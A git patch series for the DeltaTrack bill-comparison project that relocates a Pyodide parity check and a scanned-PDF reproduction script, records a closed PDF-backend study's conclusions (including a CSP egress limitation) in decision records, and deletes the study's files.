From 3d07ceaeac284f4b3ab1f3febb60c5f317541be6 Mon Sep 17 00:00:00 2001 From: Will Hea <1123070+willhea@users.noreply.github.com> Date: Sun, 4 Oct 2026 20:11:13 -0400 Subject: [PATCH 1/4] Move the Pyodide parity check into scripts/ verify_parity.py and parity_pyodide.mjs are the one live part of the staffer-delivery study: #751 (lazy pypdfium2 import) names them as its gate, and the in-browser channel is still open in #112. Relocate them as scripts/pyodide_parity.{py,mjs} so they outlive the study directory. - ROOT now resolves from scripts/. - No default node_modules beside the script: it is not gitignored, so --node-dir or DT_PYODIDE_DIR is required and must sit outside the checkout. - The docstring said --mutate exits 1; it exits 0 when the corruption is detected and 1 when it is not. Corrected to match the code. Verified on develop d3935ee1 with pyodide 314.0.7 / node 22: 3 fixtures x 2 artifacts IDENTICAL, exit 0; --mutate reports MISMATCH on every HTML row, exit 0; no node dir, exit 2. Hashes match the pre-move run. Co-Authored-By: Claude Opus 5.5 (1M context) --- scripts/README.md | 1 + .../pyodide_parity.mjs | 6 +-- .../pyodide_parity.py | 49 ++++++++++--------- 3 files changed, 30 insertions(+), 26 deletions(-) rename docs/research/staffer-delivery/probes/parity_pyodide.mjs => scripts/pyodide_parity.mjs (94%) rename docs/research/staffer-delivery/probes/verify_parity.py => scripts/pyodide_parity.py (73%) diff --git a/scripts/README.md b/scripts/README.md index 988db480..76a8a9ff 100644 --- a/scripts/README.md +++ b/scripts/README.md @@ -163,6 +163,7 @@ and open both reports ([TESTING.md](../TESTING.md#comparing-the-two-pipelines-by | `parity_table.py` | Print the PDF↔XML change-parity table for the four evidence bills — the snapshot [ADR 0014](../docs/decisions/0014-leveled-heading-tree-scope.md) records. Reporting only; `tests/test_pipeline_parity.py` is the gate that asserts the bands. | | `ugly_money_table.py -o ` | Emit a deliberately unstyled money-diff table for staffer validation (fidelity stripped so only the money diff is under test). | | `render_examples.py` | Regenerate the committed example HTML diffs and landing page under `examples/`. The only renderer of the published examples; CI deploys what it wrote, and `tests/test_committed_examples.py` fails if they're stale. | +| `pyodide_parity.py --node-dir ` | Run the XML comparison on three committed bill pairs under native CPython and under Pyodide, and fail unless the canonical JSON and HTML are byte-identical. This is the check that the engine still runs in a web page (#112, #751). Needs Node and `npm install pyodide` in ``, kept outside the checkout; `pyodide_parity.mjs` is its Pyodide half. Run `--mutate` once first: it corrupts the native HTML, so every HTML row must read MISMATCH (exit 0); a pass under `--mutate` means the check is broken (exit 1). Not in CI. | ## Smoke test diff --git a/docs/research/staffer-delivery/probes/parity_pyodide.mjs b/scripts/pyodide_parity.mjs similarity index 94% rename from docs/research/staffer-delivery/probes/parity_pyodide.mjs rename to scripts/pyodide_parity.mjs index c0812cad..1b0c9b5d 100644 --- a/docs/research/staffer-delivery/probes/parity_pyodide.mjs +++ b/scripts/pyodide_parity.mjs @@ -1,4 +1,4 @@ -/* Pyodide half of the parity harness. Driven by verify_parity.py -- not run directly. +/* Pyodide half of scripts/pyodide_parity.py, which drives it -- not run directly. * * Runs the DeltaTrack XML pipeline under Pyodide over the fixtures named on argv and * prints ONE line of JSON: environment facts plus a SHA-256 of the canonical JSON and of @@ -18,8 +18,8 @@ const [NODE_DIR, ROOT, ...SPECS] = process.argv.slice(2); // Resolve Pyodide by ABSOLUTE path rather than as a bare specifier. Node resolves bare // specifiers by walking up from the importing FILE's directory, not the working // directory, so `import { loadPyodide } from "pyodide"` only works when node_modules -// happens to sit above this probe -- which it does not, since the probe lives in the -// repo's docs tree. That made --node-dir silently inert. +// happens to sit above this script -- which it does not, since node_modules lives outside +// the checkout. That made --node-dir silently inert. const PYODIDE_ENTRY = path.join(NODE_DIR, "node_modules", "pyodide", "pyodide.mjs"); const { loadPyodide } = await import(pathToFileURL(PYODIDE_ENTRY).href); diff --git a/docs/research/staffer-delivery/probes/verify_parity.py b/scripts/pyodide_parity.py similarity index 73% rename from docs/research/staffer-delivery/probes/verify_parity.py rename to scripts/pyodide_parity.py index de93a934..ab123791 100644 --- a/docs/research/staffer-delivery/probes/verify_parity.py +++ b/scripts/pyodide_parity.py @@ -1,27 +1,30 @@ -#!/usr/bin/env python3 -"""Prove, in one command, that native CPython and Pyodide produce identical DeltaTrack output. +"""Check that the XML comparison produces byte-identical output under native CPython and Pyodide. -The delivery memo's strongest claim is that the engine emits byte-identical canonical JSON -and HTML under Pyodide. That claim was originally verified by hand, which makes it an -assertion rather than evidence. This harness makes it reproducible: it runs both runtimes -over the same committed fixtures, hashes each output with SHA-256, compares, prints the -environment that produced each result, and **exits non-zero on any mismatch**. +Running the real engine inside a web page (#112) depends on the XML pipeline behaving the +same in Pyodide as natively. This runs both runtimes over the same committed fixtures, +hashes the canonical JSON and the standalone HTML with SHA-256 inside each runtime, prints +the environment behind each column, and **exits non-zero on any mismatch**. - uv run python docs/research/staffer-delivery/probes/verify_parity.py + uv run python scripts/pyodide_parity.py --node-dir -Prerequisite: a Node install with the `pyodide` package. Point at it with -``--node-dir`` (default: ./node_modules beside this file, then $DT_PYODIDE_DIR). +Prerequisite: Node, and a directory holding the `pyodide` npm package. Pass it with +``--node-dir`` or set $DT_PYODIDE_DIR. Keep it outside the checkout. npm install pyodide # inside the chosen directory -Proving the harness can fail ----------------------------- +The Pyodide side replaces `pypdfium2` with a stub that raises if any PDFium call is +reached, because the engine imports it at module scope (#751). A mismatch or a tripwire +error therefore means the XML path changed behaviour or started depending on PDFium. + +Proving the check can fail +-------------------------- A comparison that has only ever passed cannot distinguish "the runtimes agree" from -"the comparison is broken". ``--mutate`` perturbs the native side by one character -before hashing, so the harness must report a mismatch and exit non-zero. Run it once -that way before trusting a green result. +"the comparison is broken". ``--mutate`` corrupts the native HTML by one character +before hashing, so every HTML row must report MISMATCH while the canonical rows stay +IDENTICAL. Detecting that is the expected result and exits 0; if nothing differs, the +check is broken and it exits 1. Run it once before trusting a green result. - uv run python .../verify_parity.py --mutate # expected: FAIL, exit 1 + uv run python scripts/pyodide_parity.py --mutate --node-dir """ from __future__ import annotations @@ -37,7 +40,7 @@ from pathlib import Path HERE = Path(__file__).resolve().parent -ROOT = HERE.parents[3] # probes/ -> staffer-delivery/ -> research/ -> docs/ -> repo root +ROOT = HERE.parent # (tag, bill, old, new). Committed corpus fixtures, so this needs no download. Chosen to # span the range: a small step, the large Senate rewrite, and a 1.8 MB-per-side enrolled @@ -91,7 +94,7 @@ def run_native(mutate: bool) -> dict: def run_pyodide(node_dir: Path) -> dict: specs = [f"{tag}:{bill}:{a}:{b}" for tag, bill, a, b in FIXTURES] proc = subprocess.run( - ["node", str(HERE / "parity_pyodide.mjs"), str(node_dir), str(ROOT), *specs], + ["node", str(HERE / "pyodide_parity.mjs"), str(node_dir), str(ROOT), *specs], capture_output=True, text=True, ) @@ -108,11 +111,11 @@ def main() -> int: ap.add_argument("--mutate", action="store_true", help="corrupt the native output to prove this check can fail") args = ap.parse_args() - node_dir = args.node_dir or (Path(os.environ["DT_PYODIDE_DIR"]) if os.environ.get("DT_PYODIDE_DIR") else HERE) - if not (node_dir / "node_modules" / "pyodide").is_dir(): - print(f"Pyodide not found under {node_dir}/node_modules.", file=sys.stderr) - print(f" cd {node_dir} && npm install pyodide", file=sys.stderr) - print(" or pass --node-dir / set DT_PYODIDE_DIR to a directory that has it.", file=sys.stderr) + node_dir = args.node_dir or (Path(os.environ["DT_PYODIDE_DIR"]) if os.environ.get("DT_PYODIDE_DIR") else None) + if node_dir is None or not (node_dir / "node_modules" / "pyodide").is_dir(): + print(f"Pyodide not found under {node_dir or ''}/node_modules.", file=sys.stderr) + print(" npm install pyodide in a directory outside the checkout, then pass it", file=sys.stderr) + print(" with --node-dir or set DT_PYODIDE_DIR.", file=sys.stderr) return 2 if args.mutate: From 1746b9ccf9fa62e047dcee3d31feae1620347ff1 Mon Sep 17 00:00:00 2001 From: Will Hea <1123070+willhea@users.noreply.github.com> Date: Sun, 4 Oct 2026 20:12:28 -0400 Subject: [PATCH 2/4] Record the PDF study's durable conclusions in their ADRs The PDF backend study is being removed from the tree. Its conclusions that still constrain current decisions move to the records that own them, stated as present-state facts: - ADR 0002: PDFium is the engine for anchoring and chrome handling, not a measured accuracy lead; no backend dominates, and no design for a second-backend seam was selected. - ADR 0003: the Python engine runs under Pyodide with byte-identical XML output (scripts/pyodide_parity.py); the module-scope pypdfium2 import is the one obstacle (#751); PDFium-WASM exposes the per-glyph data the extractor needs. The PDF path has not run end to end in a browser. - ADR 0011: CSP alone cannot give a browser channel zero egress; window.open and WebRTC are outside it, and Speculation Rules needs script-src without 'unsafe-inline'. Each cites CLOSEOUT.md at the #740 merge commit as evidence. Co-Authored-By: Claude Opus 5.5 (1M context) --- docs/decisions/0002-pdfium-single-engine.md | 8 ++++++++ docs/decisions/0003-pdfjs-client-side-viability.md | 10 ++++++++++ docs/decisions/0011-local-only-processing.md | 11 +++++++++++ 3 files changed, 29 insertions(+) diff --git a/docs/decisions/0002-pdfium-single-engine.md b/docs/decisions/0002-pdfium-single-engine.md index 57174555..a6019ff6 100644 --- a/docs/decisions/0002-pdfium-single-engine.md +++ b/docs/decisions/0002-pdfium-single-engine.md @@ -44,6 +44,14 @@ shipped in PRs #38 and #40. point of extraction quality for this tool. - One engine instead of two means one set of text quirks to understand and one cleaning path to maintain, at the cost of that path being PDFium-specific. +- PDFium is the engine for the anchoring and chrome behaviour above, not for a + measured accuracy lead, and no backend has one. Six backends read through one + per-glyph contract, on published GPO bills of effectively one typesetting class, + showed no winner: pdfminer.six agreed best with the XML on text and headings, while + PDFium compiled to WebAssembly reproduced current output exactly and ran about 8× + faster in the browser. No design for plugging a second backend into the extractor + was selected; a hybrid of engines and an extended per-glyph contract were both + prototyped and neither was validated ([evidence](https://github.com/civictechdc/DeltaTrack/blob/4171e32d93e869725a86ae72eab70fa355a9919f/docs/research/pdf-backend-bakeoff/CLOSEOUT.md)). - The engine-vs-engine parity check could not survive pdfplumber's removal, so the regression guard is now a golden snapshot: five curated pages, each exercising one cleaner path (soft-hyphen reconstruction, VerDate-glue, watermark-glue, diff --git a/docs/decisions/0003-pdfjs-client-side-viability.md b/docs/decisions/0003-pdfjs-client-side-viability.md index 97a9476a..706db5b2 100644 --- a/docs/decisions/0003-pdfjs-client-side-viability.md +++ b/docs/decisions/0003-pdfjs-client-side-viability.md @@ -56,6 +56,16 @@ server-side engine choice in ADR 2. - Two engines across two channels (PDFium server-side, PDF.js client-side) means two extraction paths that must be kept in agreement; divergence on edge cases is a maintenance cost if both channels ship. +- Porting to TypeScript is not the only browser route. The Python engine itself runs + in a page under Pyodide: the XML comparison produces byte-identical canonical JSON + and HTML there, checked by `scripts/pyodide_parity.py`. Its one obstacle is the + module-scope `pypdfium2` import in `parsers/pdf_text.py`, which the XML comparison + reaches through module-level imports and which the check stubs out until + [#751](https://github.com/civictechdc/DeltaTrack/issues/751) makes it lazy. For PDFs + on that route, PDFium compiled to WebAssembly (`@embedpdf/pdfium`) exposes the + per-glyph data the extractor uses and reproduced current output on the published + bills tested, which would keep one PDF engine across channels rather than two. The + PDF path has not yet run end to end in a browser ([evidence](https://github.com/civictechdc/DeltaTrack/blob/4171e32d93e869725a86ae72eab70fa355a9919f/docs/research/pdf-backend-bakeoff/CLOSEOUT.md)). - **Open risk:** the spike covered only published GPO bills, which have clean text layers. Draft and pre-introduction PDFs (watermarked, possibly image-only) were not tested and are the documents where extraction is hardest and most diff --git a/docs/decisions/0011-local-only-processing.md b/docs/decisions/0011-local-only-processing.md index 9e74a654..8f0221de 100644 --- a/docs/decisions/0011-local-only-processing.md +++ b/docs/decisions/0011-local-only-processing.md @@ -99,3 +99,14 @@ Alternatives: - Telemetry, crash reporting, or "send us the file that failed" diagnostics that would carry bill content off-device are foreclosed by this rule. Diagnostics must be local or content-free. +- **A browser channel cannot guarantee zero egress with Content Security Policy + alone.** Tested against script deliberately trying to exfiltrate, a strict policy + (`connect-src 'none'`, and no `'unsafe-inline'` in `script-src`, which Speculation + Rules prefetching otherwise gets through) blocked every subresource mechanism tried. + Two mechanisms are outside CSP entirely: `window.open` opens a new browsing context + that can carry content in its URL and leaves the page in place, and WebRTC reaches a + STUN server under any page-level policy, a covert signal rather than a content + channel. Closing them needs a browser- or device-level control such as enterprise + policy. A browser channel's no-egress claim must name that dependency and be + verified at the network layer against a control shown to observe egress + ([evidence](https://github.com/civictechdc/DeltaTrack/blob/4171e32d93e869725a86ae72eab70fa355a9919f/docs/research/pdf-backend-bakeoff/CLOSEOUT.md)). From 539fd3dc6ad5927e096c7771e1fb7a84121082cc Mon Sep 17 00:00:00 2001 From: Will Hea <1123070+willhea@users.noreply.github.com> Date: Sun, 4 Oct 2026 20:14:33 -0400 Subject: [PATCH 3/4] Move the #550 scanned-PDF reproduction into scripts/ make_scan_fixture.py lives in the PDF bake-off's probes, which are being removed, but it is the only executable reproduction of #550 (two different scanned PDFs compare as "no changes"). #550 is open and no test owns it, so under the research-retention rule it survives the study. The issue's own comment names it as the reproduction. - REPO resolves from scripts/; the sys.path insert of src/ is dropped, since the engine is installed (ADR 0017). - pypdf came from the probes' own requirements.txt, not the project. Run with `uv run --with pypdf` rather than adding a dependency. Verified on develop d3935ee1: both 20-page scans extract 20 lines, guard_declines=False, compare_pdfs -> changes=0, "DEFECT REPRODUCED". Co-Authored-By: Claude Opus 5.5 (1M context) --- scripts/README.md | 1 + .../probes => scripts}/make_scan_fixture.py | 14 ++++++-------- 2 files changed, 7 insertions(+), 8 deletions(-) rename {docs/research/pdf-backend-bakeoff/probes => scripts}/make_scan_fixture.py (90%) diff --git a/scripts/README.md b/scripts/README.md index 76a8a9ff..5af61ec5 100644 --- a/scripts/README.md +++ b/scripts/README.md @@ -164,6 +164,7 @@ and open both reports ([TESTING.md](../TESTING.md#comparing-the-two-pipelines-by | `ugly_money_table.py -o ` | Emit a deliberately unstyled money-diff table for staffer validation (fidelity stripped so only the money diff is under test). | | `render_examples.py` | Regenerate the committed example HTML diffs and landing page under `examples/`. The only renderer of the published examples; CI deploys what it wrote, and `tests/test_committed_examples.py` fails if they're stale. | | `pyodide_parity.py --node-dir ` | Run the XML comparison on three committed bill pairs under native CPython and under Pyodide, and fail unless the canonical JSON and HTML are byte-identical. This is the check that the engine still runs in a web page (#112, #751). Needs Node and `npm install pyodide` in ``, kept outside the checkout; `pyodide_parity.mjs` is its Pyodide half. Run `--mutate` once first: it corrupts the native HTML, so every HTML row must read MISMATCH (exit 0); a pass under `--mutate` means the check is broken (exit 1). Not in CI. | +| `make_scan_fixture.py --out ` | Reproduce [#550](https://github.com/civictechdc/DeltaTrack/issues/550): rasterize two disjoint 20-page windows of a committed bill into image-only PDFs, compare them, and print whether the comparison still answers "no changes" instead of declining. Synthetic stand-in for a scanned draft. macOS only (`qlmanage`, `sips`); run with `uv run --with pypdf`, since `pypdf` is not a project dependency. Delete it once a test owns #550. | ## Smoke test diff --git a/docs/research/pdf-backend-bakeoff/probes/make_scan_fixture.py b/scripts/make_scan_fixture.py similarity index 90% rename from docs/research/pdf-backend-bakeoff/probes/make_scan_fixture.py rename to scripts/make_scan_fixture.py index 5296b423..7f89fb75 100644 --- a/docs/research/pdf-backend-bakeoff/probes/make_scan_fixture.py +++ b/scripts/make_scan_fixture.py @@ -1,8 +1,7 @@ """Build image-only (scanned) PDF fixtures from a committed corpus bill. -Regenerates the reproduction for civictechdc/DeltaTrack#550 -- "Two different scanned PDFs -compare as 'no changes' instead of being declined" -- so the issue's evidence does not -depend on a scratch directory that no longer exists. +Reproduces civictechdc/DeltaTrack#550 -- "Two different scanned PDFs compare as 'no +changes' instead of being declined" -- and reports whether the defect still occurs. Each output is a real bill's pages rasterized and re-wrapped as images, so no text layer survives. That is what makes it a stand-in for a scanned or photocopied draft. It is a @@ -10,9 +9,10 @@ model, and the issue says so. Rendering is pypdf page-split plus macOS `qlmanage` (QuickLook/CoreGraphics) plus `sips` -to re-wrap the raster as a PDF. None of those is a text extractor. +to re-wrap the raster as a PDF. None of those is a text extractor. `pypdf` is not a +project dependency, so supply it for the run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/make_scan_fixture.py --out /tmp/scans + uv run --with pypdf python scripts/make_scan_fixture.py --out /tmp/scans Then, to reproduce the defect: @@ -30,8 +30,7 @@ import tempfile from pathlib import Path -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] +REPO = Path(__file__).resolve().parent.parent SOURCE = REPO / "tests/corpus/118-hr-4366/1_reported-in-house.pdf" # Two disjoint 20-page windows of one bill. Disjoint is the point: the two fixtures share @@ -89,7 +88,6 @@ def main() -> None: for name, pages in WINDOWS.items(): rasterize(SOURCE, pages, args.out / name, Path(tmp) / name) - sys.path.insert(0, str(REPO / "src")) from deltatrack.compare.pdf import _MIN_LINES_FOR_GUARD, _is_unnumbered_layout, compare_pdfs from deltatrack.parsers.pdf_text import extract_clean_pages From 331ab32435859098d1193cf71de12a6d11a7d09a Mon Sep 17 00:00:00 2001 From: Will Hea <1123070+willhea@users.noreply.github.com> Date: Sun, 4 Oct 2026 20:22:35 -0400 Subject: [PATCH 4/4] Remove the closed PDF backend study The PDF study closed in #740 as inconclusive, with no architecture recommendation. Under the research-retention rule its materials no longer answer a live question, so they leave the tree: - docs/research/pdf-backend-bakeoff/ (including CLOSEOUT.md, whose conclusions now live in ADRs 0002, 0003 and 0011) - docs/research/staffer-delivery/ - tests/data/p3/, read only by bake-off probes - the bake-off's .gitignore block - the pyproject comment clause about a frozen preservation manifest, which existed only in the bake-off. The extend-exclude itself stays for the remaining studies' probes and write-ups. The two probes still answering open questions moved to scripts/ in the preceding commits. Git history keeps everything; CLOSEOUT.md at 4171e32d is the citable record. Co-Authored-By: Claude Opus 5.5 (1M context) --- .gitignore | 31 - docs/research/pdf-backend-bakeoff/CLOSEOUT.md | 79 - .../research/pdf-backend-bakeoff/LICENSING.md | 145 - .../PRE-REGISTRATION-CONFIRMATORY.md | 795 - .../pdf-backend-bakeoff/PRE-REGISTRATION.md | 161 - docs/research/pdf-backend-bakeoff/README.md | 677 - docs/research/pdf-backend-bakeoff/RED-TEAM.md | 175 - .../pdf-backend-bakeoff/RELEASE-READINESS.md | 83 - .../RESULTS-CONFIRMATORY.md | 666 - .../pdf-backend-bakeoff/RESULTS-HYBRID.md | 829 - docs/research/pdf-backend-bakeoff/RESULTS.md | 867 - .../pdf-backend-bakeoff/probes/.gitignore | 1 - .../pdf-backend-bakeoff/probes/README.md | 238 - .../probes/backends/pdfium_hybrid.py | 184 - .../probes/backends/pdfium_native.py | 141 - .../probes/backends/pdfminer_backend.py | 89 - .../probes/backends/pymupdf_backend.py | 80 - .../probes/backends/pypdf_backend.py | 87 - .../probes/confirm_bundle.py | 178 - .../probes/confirm_egress.py | 311 - .../probes/confirm_isolation.py | 249 - .../probes/confirm_metrics.py | 262 - .../probes/confirm_perf.py | 158 - .../probes/confirm_sabotage.py | 337 - .../probes/confirm_safe_failure.py | 155 - .../probes/confirm_sensitivity.py | 209 - .../probes/confirm_vs_production.py | 139 - .../pdf-backend-bakeoff/probes/contract.py | 174 - .../probes/contract_hybrid.py | 50 - .../probes/fetch_holdout.py | 118 - .../probes/fill_confirmatory.py | 294 - .../pdf-backend-bakeoff/probes/fill_hybrid.py | 496 - .../probes/fill_results.py | 184 - .../pdf-backend-bakeoff/probes/gold_build.py | 417 - .../pdf-backend-bakeoff/probes/js/.gitignore | 2 - .../probes/js/dump_pdfium_hybrid_wasm.mjs | 144 - .../probes/js/dump_pdfium_wasm.mjs | 155 - .../probes/js/dump_pdfjs.mjs | 154 - .../probes/js/package.json | 17 - .../probes/js/phase0_pdfjs.mjs | 95 - .../probes/js/phase3_pyodide.mjs | 236 - .../probes/js/phase5_fulldoc.mjs | 114 - .../probes/js/phase5_perf.mjs | 168 - .../probes/js/probe_wasm_textapi.mjs | 122 - .../pdf-backend-bakeoff/probes/nocsp.html | 3 - .../probes/phase0_speed.py | 122 - .../probes/phase4_egress.py | 296 - .../probes/phase4_webrtc.py | 200 - .../probes/probe_backend_spacing.py | 206 - .../probes/probe_charstream.py | 193 - .../probes/probe_failure_headings.py | 121 - .../probes/probe_hybrid_portability.py | 201 - .../probes/probe_hybrid_signals.py | 260 - .../probes/probe_normalize_raw.py | 188 - .../probes/probe_space_separability.py | 204 - .../pdf-backend-bakeoff/probes/reconstruct.py | 304 - .../probes/reconstruct_hybrid.py | 276 - .../probes/redteam_ablation.py | 182 - .../probes/redteam_csp_mitigation.py | 141 - .../probes/redteam_egress2.py | 158 - .../probes/redteam_unguarded.py | 85 - .../probes/redteam_validate_amounts.py | 148 - .../probes/report_confirmatory.py | 351 - .../probes/report_phase1.py | 152 - .../probes/report_phase2.py | 181 - .../probes/requirements.txt | 29 - .../probes/score_confirmatory.py | 219 - .../probes/score_hybrid.py | 281 - .../probes/score_migration.py | 224 - .../probes/score_phase1.py | 425 - .../probes/score_phase2.py | 329 - .../pdf-backend-bakeoff/probes/score_tierb.py | 132 - .../probes/select_holdout.py | 363 - .../pdf-backend-bakeoff/probes/serve.py | 110 - .../pdf-backend-bakeoff/probes/vectors.js | 145 - .../pdf-backend-bakeoff/probes/vectors2.js | 150 - .../pdf-backend-bakeoff/probes/withcsp.html | 6 - .../pdf-backend-bakeoff/results/.gitignore | 1 - .../pdf-backend-bakeoff/results/DEVIATIONS.md | 11 - .../results/HARNESS-VALIDATION.md | 99 - .../results/confirm_bundle.json | 136 - .../results/confirm_egress.json | 438 - .../results/confirm_isolation.json | 30 - .../results/confirm_p1.json | 73232 ---------------- .../results/confirm_p1_report_repaired.json | 238 - .../results/confirm_p1_report_strict.json | 238 - .../results/confirm_p2.json | 47206 ---------- .../results/confirm_p2_report_repaired.json | 217 - .../results/confirm_p2_report_strict.json | 217 - .../results/confirm_perf.json | 138 - .../results/confirm_safe_failure.json | 325 - .../results/confirm_sensitivity.json | 530 - .../results/confirm_vs_production.json | 1704 - .../results/gold_blind.json | 799 - .../pdf-backend-bakeoff/results/gold_key.json | 4619 - .../results/holdout_membership.json | 1175 - .../results/hybrid_docs.json | 14234 --- .../results/hybrid_pairs.json | 575 - .../results/hybrid_portability.json | 170 - .../results/hybrid_wasm_entrypoints.json | 36 - .../results/migration_p1.json | 4111 - .../results/migration_p2.json | 8701 -- .../pdf-backend-bakeoff/results/phase1.json | 40651 --------- .../pdf-backend-bakeoff/results/phase2.json | 15533 ---- .../results/phase3_pyodide.json | 5764 -- .../pdf-backend-bakeoff/results/phase4.json | 184 - .../results/phase4_webrtc.json | 34 - .../results/phase5_fulldoc.json | 48 - .../results/phase5_perf.json | 126 - .../results/probe_backend_spacing.json | 46 - .../results/probe_failure_headings.json | 294 - .../results/probe_hybrid_signals.json | 203 - .../results/probe_normalize_raw.json | 426 - .../results/probe_normalize_raw_all.json | 462 - .../results/probe_separability.json | 110 - .../results/redteam_ablation.json | 210 - .../results/redteam_amount_validation.json | 12 - .../results/redteam_csp_mitigation.json | 49 - .../results/redteam_egress2.json | 58 - .../results/redteam_unguarded.json | 241 - .../pdf-backend-bakeoff/results/tierb.json | 2190 - .../validation/FINDINGS.md | 519 - .../validation/PRESERVED-MANIFEST.txt | 115 - .../pdf-backend-bakeoff/validation/README.md | 191 - .../validation/check_preservation.py | 189 - .../external-validity/HARNESS-PLAN.md | 482 - .../PRE-EXECUTION-AMENDMENTS.md | 6214 -- .../external-validity/PRE-REGISTRATION.md | 909 - .../na_00_delete_one_word.pdf | Bin 362910 -> 0 bytes .../control_fixtures/na_01_weld_two_words.pdf | Bin 534445 -> 0 bytes .../control_fixtures/na_02_split_one_word.pdf | Bin 536760 -> 0 bytes .../na_03_delete_one_word.pdf | Bin 362660 -> 0 bytes .../control_fixtures/na_04_weld_two_words.pdf | Bin 537458 -> 0 bytes .../control_fixtures/na_05_split_one_word.pdf | Bin 362782 -> 0 bytes .../na_06_delete_one_word.pdf | Bin 537538 -> 0 bytes .../control_fixtures/na_07_weld_two_words.pdf | Bin 362728 -> 0 bytes .../control_fixtures/nc_00_heading_free.pdf | Bin 2597 -> 0 bytes .../control_fixtures/nc_01_heading_free.pdf | Bin 2589 -> 0 bytes .../control_fixtures/nc_02_heading_free.pdf | Bin 2594 -> 0 bytes .../control_fixtures/nc_03_heading_free.pdf | Bin 2562 -> 0 bytes .../holdout/113-hr-933/eas.pdf | Bin 1026538 -> 0 bytes .../holdout/114-s-3001/pcs.pdf | Bin 229847 -> 0 bytes .../holdout/115-hr-5961/rh.pdf | Bin 272490 -> 0 bytes .../holdout/115-hr-6147/rh.pdf | Bin 458859 -> 0 bytes .../holdout/115-hr-6157/eas.pdf | Bin 513087 -> 0 bytes .../holdout/115-s-1609/pcs.pdf | Bin 203572 -> 0 bytes .../holdout/115-s-2976/pcs.pdf | Bin 265790 -> 0 bytes .../holdout/116-hr-7611/rh.pdf | Bin 286181 -> 0 bytes .../holdout/116-hr-7617/rfs.pdf | Bin 2021777 -> 0 bytes .../holdout/117-hr-3237/eas.pdf | Bin 140238 -> 0 bytes .../holdout/117-s-4663/is.pdf | Bin 437707 -> 0 bytes .../holdout/119-hr-6938/enr.pdf | Bin 507459 -> 0 bytes .../holdout/119-hr-7148/enr.pdf | Bin 1410700 -> 0 bytes .../holdout/119-hr-8469/pcs.pdf | Bin 356739 -> 0 bytes .../CRPT-114HRPT215/CRPT-114HRPT215.pdf | Bin 1836306 -> 0 bytes .../CRPT-114HRPT605/CRPT-114HRPT605.pdf | Bin 990174 -> 0 bytes .../CRPT-119HRPT632/CRPT-119HRPT632.pdf | Bin 2037364 -> 0 bytes .../probes/adjudicator_prompt.md | 128 - .../probes/anchor_provenance.py | 296 - .../external-validity/probes/build_frames.py | 706 - .../external-validity/probes/build_oracle.py | 1476 - .../probes/continuation_provenance.py | 192 - .../probes/control_fixtures.py | 1205 - .../probes/cross_engine_control.py | 318 - .../probes/decide_architecture.py | 830 - .../external-validity/probes/execute_study.py | 756 - .../external-validity/probes/m3_boundaries.py | 255 - .../external-validity/probes/m3_selftest.py | 156 - .../probes/methodology_contracts.py | 522 - .../probes/neutral_geometry.py | 265 - .../probes/neutral_identity.py | 610 - .../probes/oracle_geometry.py | 190 - .../probes/pdfium_extended_corrected.py | 215 - .../probes/reconstruct_extended_corrected.py | 277 - .../external-validity/probes/run_extended.py | 46 - .../external-validity/probes/run_hybrid.py | 260 - .../external-validity/probes/s1_control.py | 181 - .../external-validity/probes/score_metrics.py | 2008 - .../probes/x00_design_pilot.py | 164 - .../probes/x01_contamination.py | 254 - .../probes/x02_oracle_reference_defects.py | 142 - .../probes/x03_select_holdout.py | 705 - .../probes/x04_freeze_check.py | 4229 - .../probes/x05_design_exposure.py | 78 - .../probes/x07_neutral_geometry.py | 359 - .../probes/x08_neutral_identity.py | 428 - .../probes/x09_skeleton_cross_engine.py | 447 - .../probes/x10_reconstruction_signature.py | 962 - .../probes/x11_provenance_chain.py | 199 - .../probes/x12_skeleton_eligibility.py | 233 - .../external-validity/probes/x13_x_arm.py | 168 - .../probes/x14_anchor_bridge.py | 213 - .../probes/x15_methodology_contracts.py | 665 - .../probes/x16_occurrence_identity.py | 504 - .../probes/x17_build_frames.py | 782 - .../probes/x18_start_x_discriminability.py | 545 - .../probes/x20_oracle_crop_coordinates.py | 875 - .../probes/x21_build_oracle.py | 1646 - .../probes/x22_score_input_contract.py | 848 - .../probes/x23_control_fixtures.py | 1049 - .../probes/x24_xml_source_bridge.py | 379 - .../probes/x25_bridge_validation.py | 508 - .../probes/x26_control_oracle.py | 186 - .../probes/x27_score_metrics.py | 3734 - .../probes/x28_decide_architecture.py | 1436 - .../probes/x29_execute_study.py | 1203 - .../external-validity/probes/x2_verify.py | 587 - .../probes/x30_continuation_boundary.py | 519 - .../probes/x30_labelling_fixture.py | 29 - .../probes/x31_dframe_budget_routes.py | 420 - .../probes/x32_effective_routes.py | 380 - .../external-validity/probes/xml_sources.py | 657 - .../results/CONTINUATION.json | 103 - .../external-validity/results/DEVIATIONS.md | 1192 - .../results/contamination.json | 3676 - .../results/control_fixtures.json | 1938 - .../results/design_exposure.json | 131 - .../results/design_runs/x03.log | 27 - .../results/design_runs/x03c.log | 29 - .../results/design_runs/x03d.log | 32 - .../results/design_runs/x03e.log | 31 - .../results/holdout_membership.json | 551 - .../results/x00_design_pilot.json | 115 - .../results/x02_oracle_reference_defects.json | 227 - .../results/x09_skeleton_cross_engine.json | 298 - .../results/x11_provenance_chain.json | 105 - .../external-validity/results/x13_x_arm.json | 100 - .../results/x26_control_oracle.json | 199 - .../results/x2_contract_assertions.json | 143 - .../phase2/FINDINGS-EXTENDED-GLYPH.md | 400 - .../validation/phase2/contract_extended.py | 65 - .../phase2/g01_pdfium_advance_gate.py | 390 - .../validation/phase2/g02_wasm_advance.mjs | 127 - .../validation/phase2/g03_backend_fields.py | 305 - .../validation/phase2/g04_score_boundaries.py | 290 - .../validation/phase2/g05_failure_headings.py | 86 - .../validation/phase2/g06_corpus_parity.py | 93 - .../validation/phase2/g07_extraction_cost.py | 162 - .../validation/phase2/pdfium_extended.py | 159 - .../validation/phase2/reconstruct_extended.py | 297 - .../results/g01_pdfium_advance_gate.json | 222 - .../phase2/results/g02_wasm_advance.json | 43 - .../phase2/results/g03_backend_fields.json | 59 - .../phase2/results/g04_boundary_scores.json | 169 - .../phase2/results/g05_failure_headings.json | 378 - .../phase2/results/g06_corpus_parity.json | 2958 - .../phase2/results/g07_extraction_cost.json | 23 - .../phase3/FINDINGS-CROSS-BACKEND.md | 785 - .../phase3/h01_advance_semantics.py | 442 - .../phase3/h02_pdfjs_percharacter.mjs | 142 - .../phase3/h03_score_cross_backend.py | 448 - .../phase3/h04_page_scale_agreement.py | 357 - .../phase3/h05_diagnose_divergence.py | 411 - .../validation/phase3/h06_raw_precision.py | 492 - 